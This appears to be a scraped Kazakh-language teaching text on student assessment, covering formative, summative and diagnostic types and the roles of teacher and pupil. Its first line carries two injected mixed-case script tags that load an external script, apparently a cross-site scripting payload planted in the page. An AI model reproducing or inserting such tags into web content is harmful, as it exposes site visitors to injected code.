<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
Бағалау дегеніміз не?
Бағалау дегеніміз оқу нәтижелері туралы дәлелдерді жинау үдерісі, содан кейін дәлелдердің негізінде жұмысты бағалау үшін белгіленген критерийлерді пайдалану, орындалған жұмыс туралы қорытынды шығару.
Бағалау түрлері:
1. Қалыптастырушы бағалау оқушыларды оқу және оқыту үдерісінде бағалау.
2. Жиынтық бағалау оқуды бағалау.
3. Диагностикалық бағалау күшті және әлсіз жақтарды айқындау
үшін дағдылар мен білімді өлшейді.
Бағалау түрлерінің ішінен қалыптастырушы бағалауды қарастырсақ: қалыптастырушы бағалау оқу бағдарламасындағы оқу мақсаттарына жетуге көмектеседі, қиындықтың алдын алуға мүмкіндік береді, оқу үрдісінде білім алушылардың білімі мен дағдыларының қалыптасу, білімді меңгеру деңгейін анықтайды.
Қалыптастырушы бағалауды мұғалім және оқушының қатысуымен тоқсан барысында өткізеді. Материалды оқу барысында тапсырманы қаншалықты дұрыс орындағаны жөнінде оқушылар ақпарат алады. Оқушының ілгерілеуі жөнінде мұғалім ақпарат алып, оқыту үдерісіне өзгерістер енгізе алады. Оқушының қызметі, оқу үдерісіне белсене қатысады, бағалау критерийлері мен дескрипторларды түсінеді, өзін-өзі бағалайды, бірін-бірі бағалайды.
Мұғалімнің қызметі оқу мақсаттарына сәйкес бағалау критерийлерін анық жазады, бағалау критерийлеріне сәйкес тапсырмалар құрастырады, тапсырмаға дескриптор құрастырады, оқушыларға тиімді кері байланыс береді, оқыту мен бағалау үдерісіне түзету енгізеді.
Өткізу түрі: жеке, жұппен, топпен ауысатын топтар құрамында.